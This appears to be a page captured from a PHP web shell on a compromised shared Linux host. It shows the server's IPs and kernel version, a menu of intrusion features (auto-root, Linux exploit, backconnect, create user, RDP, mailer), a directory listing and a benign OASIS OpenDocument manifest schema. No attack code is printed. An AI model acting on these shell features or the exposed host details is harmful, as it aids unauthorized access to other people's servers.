Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
etc /
schema /
[ HOME SHELL ]
Name
Size
Permission
Action
README
5.03
KB
-rw-r--r--
calstbl.rnc
7.23
KB
-rw-r--r--
dbcalstbl.rnc
762
B
-rw-r--r--
dbhier.rnc
38.46
KB
-rw-r--r--
dbnotn.rnc
2.55
KB
-rw-r--r--
dbpool.rnc
139
KB
-rw-r--r--
dbstart.rnc
353
B
-rw-r--r--
docbook.rnc
1.76
KB
-rw-r--r--
locate.rnc
6.63
KB
-rw-r--r--
od-manifest-schema-v1.2-os.rnc
3.73
KB
-rw-r--r--
od-schema-v1.2-os.rnc
208.75
KB
-rw-r--r--
rdfxml.rnc
6.13
KB
-rw-r--r--
relaxng.rnc
2.78
KB
-rw-r--r--
schemas.xml
2.7
KB
-rw-r--r--
xhtml-applet.rnc
441
B
-rw-r--r--
xhtml-attribs.rnc
457
B
-rw-r--r--
xhtml-base.rnc
121
B
-rw-r--r--
xhtml-bdo.rnc
216
B
-rw-r--r--
xhtml-bform.rnc
1.62
KB
-rw-r--r--
xhtml-btable.rnc
975
B
-rw-r--r--
xhtml-csismap.rnc
817
B
-rw-r--r--
xhtml-datatypes.rnc
1.44
KB
-rw-r--r--
xhtml-edit.rnc
333
B
-rw-r--r--
xhtml-events.rnc
1.62
KB
-rw-r--r--
xhtml-form.rnc
1.62
KB
-rw-r--r--
xhtml-frames.rnc
774
B
-rw-r--r--
xhtml-hypertext.rnc
479
B
-rw-r--r--
xhtml-iframe.rnc
465
B
-rw-r--r--
xhtml-image.rnc
290
B
-rw-r--r--
xhtml-inlstyle.rnc
64
B
-rw-r--r--
xhtml-legacy.rnc
3.46
KB
-rw-r--r--
xhtml-link.rnc
402
B
-rw-r--r--
xhtml-lst.rnc
475
B
-rw-r--r--
xhtml-meta.rnc
250
B
-rw-r--r--
xhtml-nameident.rnc
272
B
-rw-r--r--
xhtml-object.rnc
675
B
-rw-r--r--
xhtml-param.rnc
238
B
-rw-r--r--
xhtml-pres.rnc
649
B
-rw-r--r--
xhtml-ruby.rnc
539
B
-rw-r--r--
xhtml-script.rnc
483
B
-rw-r--r--
xhtml-ssismap.rnc
104
B
-rw-r--r--
xhtml-struct.rnc
513
B
-rw-r--r--
xhtml-table.rnc
1.88
KB
-rw-r--r--
xhtml-text.rnc
2.31
KB
-rw-r--r--
xhtml-tgt.rnc
206
B
-rw-r--r--
xhtml-xstyle.rnc
256
B
-rw-r--r--
xhtml.rnc
954
B
-rw-r--r--
xslt.rnc
10.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : od-manifest-schema-v1.2-os.rnc
# Open Document Format for Office Applications (OpenDocument) Version 1.2 # OASIS Standard, 29 September 2011 # Manifest Relax-NG Schema # Source: http://docs.oasis-open.org/office/v1.2/os/ # Copyright (c) OASIS Open 2002-2011, 2013. All Rights Reserved. # # All capitalized terms in the following text have the meanings assigned to them # in the OASIS Intellectual Property Rights Policy (the "OASIS IPR Policy"). The # full Policy may be found at the OASIS website. # # This document and translations of it may be copied and furnished to others, and # derivative works that comment on or otherwise explain it or assist in its # implementation may be prepared, copied, published, and distributed, in whole or # in part, without restriction of any kind, provided that the above copyright # notice and this section are included on all such copies and derivative works. # However, this document itself may not be modified in any way, including by # removing the copyright notice or references to OASIS, except as needed for the # purpose of developing any document or deliverable produced by an OASIS # Technical Committee (in which case the rules applicable to copyrights, as set # forth in the OASIS IPR Policy, must be followed) or as required to translate it # into languages other than English. # # The limited permissions granted above are perpetual and will not be revoked by # OASIS or its successors or assigns. # # This document and the information contained herein is provided on an "AS IS" # basis and OASIS DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT # LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION HEREIN WILL NOT # INFRINGE ANY OWNERSHIP RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR # FITNESS FOR A PARTICULAR PURPOSE. namespace manifest = "urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" start = manifest manifest = element manifest:manifest { manifest-attlist, file-entry+ } manifest-attlist = attribute manifest:version { "1.2" } file-entry = element manifest:file-entry { file-entry-attlist, encryption-data? } file-entry-attlist = attribute manifest:full-path { \string } & attribute manifest:size { nonNegativeInteger }? & attribute manifest:media-type { \string } & attribute manifest:preferred-view-mode { "edit" | "presentation-slide-show" | "read-only" | namespacedToken }? & attribute manifest:version { \string }? encryption-data = element manifest:encryption-data { encryption-data-attlist, algorithm, start-key-generation?, key-derivation } encryption-data-attlist = attribute manifest:checksum-type { "SHA1/1K" | anyURI } & attribute manifest:checksum { base64Binary } algorithm = element manifest:algorithm { algorithm-attlist, anyElements } algorithm-attlist = attribute manifest:algorithm-name { "Blowfish CFB" | anyURI } & attribute manifest:initialisation-vector { base64Binary } anyAttListOrElements = attribute * { text }*, anyElements anyElements = element * { mixed { anyAttListOrElements } }* key-derivation = element manifest:key-derivation { key-derivation-attlist, empty } key-derivation-attlist = attribute manifest:key-derivation-name { "PBKDF2" | anyURI } & attribute manifest:salt { base64Binary } & attribute manifest:iteration-count { nonNegativeInteger } & attribute manifest:key-size { nonNegativeInteger }? start-key-generation = element manifest:start-key-generation { start-key-generation-attlist, empty } start-key-generation-attlist = attribute manifest:start-key-generation-name { "SHA1" | anyURI } & attribute manifest:key-size { nonNegativeInteger }? base64Binary = xsd:base64Binary namespacedToken = xsd:QName { pattern = "[^:]+:[^:]+" } nonNegativeInteger = xsd:nonNegativeInteger \string = xsd:string anyURI = xsd:anyURI
Close